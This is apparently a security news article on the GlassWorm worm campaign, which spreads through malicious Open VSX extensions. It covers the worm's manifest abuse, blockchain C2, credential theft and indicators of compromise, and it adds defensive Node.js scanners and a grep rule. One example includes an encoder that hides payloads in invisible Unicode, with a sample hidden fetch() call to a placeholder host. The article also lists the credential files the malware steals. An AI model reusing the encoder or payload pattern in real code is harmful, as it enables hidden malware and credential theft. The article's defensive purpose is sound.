GlassWorm Escalates: 72 Malicious Open VSX Extensions Use
Dylan H.

News Desk

March 14, 2026
7 min read

GlassWorm Campaign Escalates with 72 Open VSX Extensions and Blockchain C2

The GlassWorm self-propagating worm campaign — the first confirmed supply-chain worm targeting VS Code extension ecosystems — has significantly escalated. Security researchers at the Socket Research Team disclosed on March 13, 2026 that at least 72 additional malicious Open VSX extensions were published between January 31 and March 13, 2026, introducing a new propagation mechanism that abuses legitimate VS Code manifest fields to silently install the loader via transitive dependencies.

This Wave 4 iteration is the most sophisticated to date, combining invisible Unicode obfuscation, a Solana blockchain dead-drop C2 resolver, and a Google Calendar backup C2 channel with a full post-exploitation toolkit that transforms developer workstations into criminal infrastructure nodes.


What Is Open VSX?

Open VSX Registry is an open-source, vendor-neutral alternative to Microsoft's proprietary Visual Studio Marketplace, operated by the Eclipse Foundation. It serves VS Code-compatible editors that cannot access the Microsoft marketplace — most notably VSCodium, Eclipse Theia, Gitpod, and others. Because these editors rely exclusively on Open VSX, any malicious package published there reaches users without Microsoft's review pipeline.


GlassWorm Timeline

Wave                               Date                    Scale
Precursor (npm)                    March 2025              Invisible Unicode in npm packages
Wave 1 (Open VSX)                  October 2025            7 extensions, 35,800 downloads
Wave 2 (Open VSX + GitHub)         November 2025           3 extensions, 10,000+ downloads
Wave 3 (compromised dev account)   January 2026            4 extensions, 22,000+ downloads
Wave 4 (current)                   Jan 31 - Mar 13, 2026   72 extensions, transitive delivery

The 72-Extension Wave 4 Campaign

The 72 malicious extensions impersonate widely used developer tools across multiple categories:

  • Code linters and formatters — fake ESLint, Prettier
  • Language tooling — Python, Vue, Angular, Flutter support
  • Code runners and utilities — general productivity tools
  • AI coding assistants — impersonations of Claude Code (Anthropic), GitHub Codex, Google Antigravity

Confirmed examples from Socket's IOC list include:

  • otoboss.autoimport-extension
  • federicanc.dotenv-syntax-highlighting
  • twilkbilk.color-highlight-css
  • crotoapp.vscode-xml-extension
  • oigotm.my-command-palette-extension

New Wave 4 Technique: Transitive Dependency Abuse

The most significant innovation in Wave 4 is the abuse of two legitimate VS Code manifest fields:

  • extensionPack — groups of related extensions installed together
  • extensionDependencies — extensions that must be installed for functionality

The Attack Flow

  1. The attacker publishes an extension that appears entirely benign, with no malicious content
  2. After accumulating installs and trust, a later update silently adds a reference to a separate GlassWorm loader extension via extensionPack or extensionDependencies
  3. VS Code automatically installs the newly declared dependency on the next update — pulling in the malicious loader without any direct user action

This means a point-in-time scan of an extension's current code is not enough. The malicious change is a manifest edit between two published versions, not new JavaScript in the extension itself, so scanners that only inspect the bundled code of the version they are given will not flag it. The signal lives in the version history: a dependency or pack entry that did not exist in the previous release.


Technical Mechanisms

Invisible Unicode Obfuscation

All meaningful strings in the loader are hidden in Unicode variation selector codepoints (not Private Use Area characters, which occupy U+E000–U+F8FF):

  • Ranges: U+FE00–U+FE0F (Variation Selectors) and U+E0100–U+E01EF (Variation Selectors Supplement)
  • These codepoints are zero-width combining characters: editors, terminals, IDEs and PR diff viewers render nothing for them, so a string literal can carry kilobytes of payload while appearing empty
  • A small inline decoder maps each codepoint back to a byte and passes the reconstructed text to eval() at runtime
  • No malicious code is visible on static inspection of the file; only a byte-level or codepoint-level scan reveals it
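As an added illustration (this is not the GlassWorm loader's code, nor code from Socket or Koi), the following Node.js snippet shows both sides of the technique: how bytes are packed into variation selectors so they vanish from view, and how a scanner finds and decodes such runs without executing them. The byte-to-codepoint mapping used here is an assumption chosen so that every byte value has a slot (0x00–0x0F into U+FE00–U+FE0F, 0x10–0xFF into U+E0100–U+E01EF); the loader's real mapping is not published on this page. The sample source file is constructed inline.

```javascript
// Added example, not the GlassWorm loader. The byte->codepoint mapping is an assumption.
const VS_LOW = 0xfe00;    // U+FE00..U+FE0F  (16 codepoints) carry byte values 0x00..0x0F
const VS_HIGH = 0xe0100;  // U+E0100..U+E01EF (240 codepoints) carry byte values 0x10..0xFF

function isVariationSelector(cp) {
  return (cp >= 0xfe00 && cp <= 0xfe0f) || (cp >= 0xe0100 && cp <= 0xe01ef);
}

// Attacker-side packing: every byte becomes one invisible codepoint.
function encodeBytes(bytes) {
  let out = '';
  for (const b of bytes) out += String.fromCodePoint(b < 16 ? VS_LOW + b : VS_HIGH + (b - 16));
  return out;
}

// Loader-side unpacking (minus the eval): map each selector back to its byte, skip everything else.
function decodeBytes(str) {
  const bytes = [];
  for (const ch of str) {               // for-of iterates code points, not UTF-16 units
    const cp = ch.codePointAt(0);
    if (cp >= 0xfe00 && cp <= 0xfe0f) bytes.push(cp - VS_LOW);
    else if (cp >= 0xe0100 && cp <= 0xe01ef) bytes.push(cp - VS_HIGH + 16);
  }
  return Buffer.from(bytes);
}

// Scanner: report each run of variation selectors by line, column (in code points) and length.
// A lone U+FE0F after an emoji is legitimate, so a run threshold keeps false positives down.
function findHiddenRuns(source, minRun = 8) {
  const hits = [];
  source.split('\n').forEach((line, idx) => {
    let run = 0, col = 0, start = 0;
    const flush = () => {
      if (run >= minRun) hits.push({ line: idx + 1, col: start, length: run });
      run = 0;
    };
    for (const ch of line) {
      if (isVariationSelector(ch.codePointAt(0))) { if (run === 0) start = col; run += 1; }
      else flush();
      col += 1;
    }
    flush();
  });
  return hits;
}

// Analyst side: recover the hidden bytes of every run without running them.
function extractHiddenPayloads(source, minRun = 8) {
  const lines = source.split('\n');
  return findHiddenRuns(source, minRun).map(h => {
    const chars = Array.from(lines[h.line - 1]).slice(h.col, h.col + h.length).join('');
    return { ...h, payload: decodeBytes(chars).toString('utf8') };
  });
}

// Constructed sample: a benign-looking extension.js whose string literal holds a hidden payload.
// 203.0.113.0/24 is a documentation range, not a real C2.
const payloadText = 'fetch("http://203.0.113.10/stage")';
const hiddenPayload = encodeBytes(Buffer.from(payloadText, 'utf8'));
const sampleSource = [
  '// json helpers \u2705\uFE0F',                 // emoji with a single U+FE0F: legitimate
  'const s = "' + hiddenPayload + '";',           // looks like an empty string in any editor
  'module.exports = { activate() {} };',
].join('\n');

console.log(findHiddenRuns(sampleSource));            // one run on line 2, 34 codepoints
console.log(extractHiddenPayloads(sampleSource)[0].payload);
```

Run it with `node` to see that the scanner reports a 34-codepoint run on line 2 of a file whose second line looks like `const s = "";` in an editor. Pointing `extractHiddenPayloads` at a real sample gives you the decoded stage-one text for static analysis instead of letting `eval()` run it.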

Solana Blockchain Dead-Drop C2

Rather than hardcoding a C2 IP address, the loader queries an attacker-controlled Solana wallet and reads transaction memos for a Base64-encoded string that decodes to the current C2 server address.

  • Known C2 IPs: 217.69.3[.]218 and 199.247.10[.]166
  • Attacker rotates Solana wallets in Wave 4 to further evade detection
  • Because the memos sit on a public, append-only ledger, the resolver itself cannot be disrupted by domain seizure or hosting takedowns. The addresses it resolves to can still be blocked, and defenders can read the same wallet's memos to learn the current C2 address as soon as the attacker publishes it

Embedded cryptographic indicators:

AES Key: wDO6YyTm6DL0T0zJ0SXhUql5Mo0pdlSz
AES IV:  c4b9a3773e9dced6015a670855fd32b

Google Calendar Backup C2

A secondary C2 channel fetches a Google Calendar event URL embedded in the payload, parses a Base64-encoded string from the event description, and uses the decoded value as a fallback staging server when the Solana-based primary resolver is unavailable.
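To make the resolution order concrete, the Node.js example below (added here; not the loader's own code) models a resolver that walks a wallet's memos newest-first, accepts the first value that Base64-decodes to a well-formed IPv4:port, and falls back to a Base64 blob in a calendar event description. The memo layout, the description layout and the host:port shape of the decoded value are assumptions; the page does not publish the loader's parsing details. The two known C2 addresses from the IOC list are used to tag a resolved address as known-bad. All inputs are constructed and nothing is fetched.

```javascript
// Added example, not GlassWorm code. Memo/description formats and the host:port shape are assumed.

// The two C2 addresses published on this page.
const KNOWN_C2 = new Set(['217.69.3.218', '199.247.10.166']);

const ADDR_RE = /^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$/;

// Base64-decode one candidate and accept it only if it is a well-formed IPv4:port.
function decodeC2(candidate) {
  if (typeof candidate !== 'string') return null;
  const text = Buffer.from(candidate.trim(), 'base64').toString('utf8');
  const m = ADDR_RE.exec(text);
  if (!m) return null;
  const octetsOk = m[1].split('.').every(o => Number(o) <= 255);
  const port = Number(m[2]);
  return octetsOk && port >= 1 && port <= 65535 ? { host: m[1], port } : null;
}

// Primary channel: transaction memos, newest first; the first valid one wins.
function resolveFromMemos(memos) {
  for (const memo of memos) {
    const c2 = decodeC2(memo);
    if (c2) return { ...c2, channel: 'solana-memo' };
  }
  return null;
}

// Fallback channel: a Base64 blob embedded in a calendar event description.
function resolveFromCalendar(description) {
  const m = /([A-Za-z0-9+\/]{8,}={0,2})/.exec(description || '');
  const c2 = m ? decodeC2(m[1]) : null;
  return c2 ? { ...c2, channel: 'google-calendar' } : null;
}

// Resolution order as described: blockchain first, calendar only when that yields nothing.
function resolveC2({ memos = [], calendarDescription = '' }) {
  const c2 = resolveFromMemos(memos) || resolveFromCalendar(calendarDescription);
  if (!c2) return null;
  return { ...c2, knownGlassWormC2: KNOWN_C2.has(c2.host) };
}

// Constructed samples. 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
const b64 = s => Buffer.from(s, 'utf8').toString('base64');
const sampleMemos = [
  'gm',                        // unrelated memo on the same wallet
  b64('217.69.3.218:443'),     // current C2, one of the IPs from the IOC list
  b64('203.0.113.10:443'),     // an earlier rotation
];
const sampleCalendar = 'Weekly sync ' + b64('198.51.100.9:8443');

console.log(resolveC2({ memos: sampleMemos, calendarDescription: sampleCalendar }));
console.log(resolveC2({ memos: ['gm'], calendarDescription: sampleCalendar }));
console.log(resolveC2({ memos: [], calendarDescription: 'no dead drop here' }));
```

The same decoding logic is what an analyst runs over memos pulled from the attacker's wallet: whatever the loader would accept as its next C2, you can extract and block before the loader on a victim machine asks for it.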

Russian Locale Gating

Every GlassWorm iteration aborts execution if the target system's locale is Russian. This check is common in malware from Russian-speaking cybercrime groups, which avoid domestic victims to reduce the risk of local prosecution; it is an indicator of the operators' origin, not proof.


Full Post-Exploitation Capability Chain

Stage 1: Credential Harvesting

The loader silently exfiltrates all developer credentials on the infected machine:

Credential type                 Source
npm auth tokens                 ~/.npmrc
GitHub tokens (OAuth + PAT)     OS keychain, ~/.gitconfig, environment variables
Open VSX publishing tokens      extension configuration
Git credentials                 Git credential manager
SSH private keys                ~/.ssh/

Stage 2: Self-Propagation

Harvested credentials are immediately weaponized to push additional infected packages and extensions to npm, GitHub, and Open VSX under the victim's identity — creating exponential spread through the ecosystem without new attacker infrastructure.

Stage 3: Cryptocurrency Wallet Targeting

The payload actively hunts for 49 different cryptocurrency wallet browser extensions including MetaMask, Phantom, and Coinbase Wallet, with intent to drain funds.

Stage 4: Zombi Module Deployment

A second-stage payload, Zombi, is fetched from C2 and transforms the developer workstation into a full criminal infrastructure node:

Zombi module          Function
SOCKS5 proxy server   Routes attacker traffic through the victim's machine, giving the attacker an egress point that already sits inside the corporate network
Hidden VNC (HVNC)     Full real-time remote control of the infected machine in a desktop session the user does not see
WebRTC modules        Peer-to-peer communication between infected nodes
BitTorrent DHT        Decentralized C2 distribution via the BitTorrent Distributed Hash Table

Scale and Impact

  • 35,800+ confirmed downloads of infected extensions (Wave 1 alone)
  • 22,000+ additional downloads from compromised legitimate developer identity (Wave 3)
  • 151 GitHub repositories directly affected between March 3–9, 2026
  • Developer workstations inside corporate networks turned into SOCKS proxy nodes for criminal activity
  • Any developer who installed, published, or contributed to affected packages may have had credentials exfiltrated

Detection and Mitigation

Immediate Actions

  1. Cross-reference all installed extensions against the Socket Research Team's IOC list
  2. Rotate all credentials — npm tokens, GitHub tokens (OAuth and PAT), Open VSX publishing tokens, SSH keys — if any affected extension was installed
  3. Audit extension manifests for newly added extensionPack or extensionDependencies fields in recent version history — watch for manifest changes that introduce new dependency relationships
  4. Check for unauthorized SSH keys and revoke unknown entries
  5. Review outbound connections from developer workstations for Solana RPC calls or connections to 217.69.3[.]218 / 199.247.10[.]166
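Step 3 above, and the attack flow in the transitive-dependency section, come down to one check: diff the extensionPack and extensionDependencies fields across an extension's published versions and flag anything new. The Node.js script below is an added example of that audit (not Socket's tooling and not a registry API); the manifests are constructed inline, and the publisher and extension ids in them are hypothetical. In practice you would download each published version's .vsix, unzip it and read extension/package.json from it.

```javascript
// Added example. Manifests below are constructed; publisher and extension ids are hypothetical.
const DEP_FIELDS = ['extensionPack', 'extensionDependencies'];

// Parse a package.json and normalise the two dependency-bearing fields to lower-case id lists
// (extension ids are compared case-insensitively here so a casing change is not a false "new" entry).
function parseManifest(json) {
  const m = JSON.parse(json);
  const deps = {};
  for (const f of DEP_FIELDS) {
    const v = m[f];
    if (v === undefined) { deps[f] = []; continue; }
    if (!Array.isArray(v) || !v.every(x => typeof x === 'string')) throw new Error(`${f} is not a string array`);
    deps[f] = v.map(x => x.toLowerCase());
  }
  return { id: `${m.publisher}.${m.name}`.toLowerCase(), version: m.version, deps };
}

// Compare two consecutive versions and list every dependency/pack entry that appears in the newer one.
function diffDependencies(prevJson, nextJson) {
  const prev = parseManifest(prevJson), next = parseManifest(nextJson);
  const added = [];
  for (const f of DEP_FIELDS) {
    const before = new Set(prev.deps[f]);
    for (const id of next.deps[f]) if (!before.has(id)) added.push({ field: f, id });
  }
  // Heuristic, not a rule: a pull-in from a different publisher is the shape of the Wave 4 loader
  // insertion, but a compromised account (Wave 3) can add a same-publisher dependency just as well.
  const publisher = next.id.split('.')[0];
  const crossPublisher = added.filter(a => a.id.split('.')[0] !== publisher);
  return { id: next.id, from: prev.version, to: next.version, added, crossPublisher };
}

// Walk the whole version history, oldest first, and keep every release that introduced dependencies.
function auditHistory(manifestsOldestFirst) {
  const findings = [];
  for (let i = 1; i < manifestsOldestFirst.length; i++) {
    const d = diffDependencies(manifestsOldestFirst[i - 1], manifestsOldestFirst[i]);
    if (d.added.length) findings.push(d);
  }
  return findings;
}

// Constructed history: 1.0.1 adds a same-publisher dependency, 1.0.2 adds a cross-publisher
// pack entry with no other change, 1.0.3 only changes casing of an existing id.
const base = { publisher: 'acme', name: 'json-tools' };
const history = [
  JSON.stringify({ ...base, version: '1.0.0' }),
  JSON.stringify({ ...base, version: '1.0.1', extensionDependencies: ['acme.json-core'] }),
  JSON.stringify({ ...base, version: '1.0.2', extensionDependencies: ['acme.json-core'], extensionPack: ['otherpub.helper-loader'] }),
  JSON.stringify({ ...base, version: '1.0.3', extensionDependencies: ['Acme.JSON-Core'], extensionPack: ['otherpub.helper-loader'] }),
];

console.log(JSON.stringify(auditHistory(history), null, 2));
```

The 1.0.1 to 1.0.2 step is the one to look at: the extension's own code is unchanged, yet the editor will now install otherpub.helper-loader on the next update. A scanner that only reads 1.0.2 in isolation sees a manifest that looks like any extension pack; the diff is what makes it a finding.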

Detection Rules

Knostic has published YARA rules targeting GlassWorm, flagging:

  • Solana blockchain C2 lookup patterns
  • Credential harvesting patterns for npm/GitHub/OpenVSX/Git/SSH
  • The specific AES key/IV constants embedded in the loader
A quick first-pass screen for the obfuscation itself (GNU grep with PCRE; the \x{...} codepoint escapes need a UTF-8 locale):

# Screen JavaScript files for invisible Unicode variation selectors
# (U+FE00-U+FE0F and U+E0100-U+E01EF). A single U+FE0F after an emoji is
# normal in string literals; long runs, or any hit outside a string, are not.
LC_ALL=C.UTF-8 grep -rnP '[\x{FE00}-\x{FE0F}\x{E0100}-\x{E01EF}]' --include='*.js' .

Structural Defenses

  • Prefer a marketplace that verifies extension signatures, and treat that as a bar rather than a guarantee: the Microsoft Marketplace applies signature verification that Open VSX currently lacks, but a signature proves only that a package came from a registered publisher account, and GlassWorm publishes through stolen publisher tokens and accounts it registers itself
  • Use extension allowlists in enterprise environments rather than permitting arbitrary extension installs
  • Monitor extension version history, not just the current version — the transitive dependency attack is invisible in current-version scans
  • Apply the principle of least privilege to developer workstations; restrict outbound internet access to necessary endpoints

Sources

  • The Hacker News — GlassWorm Supply-Chain Attack Abuses 72 Open VSX Extensions to Target Developers
  • Socket Research Team — 72 Malicious Open VSX Extensions Linked to GlassWorm Campaign
  • Koi Security — GlassWorm: First Self-Propagating Worm Using Invisible Code
  • BleepingComputer — Self-Spreading GlassWorm Malware Hits OpenVSX, VS Code Registries
  • Knostic — Detecting GlassWorm with YARA Rules
  • Dark Reading — GlassWorm Returns to Shatter Developer Ecosystems
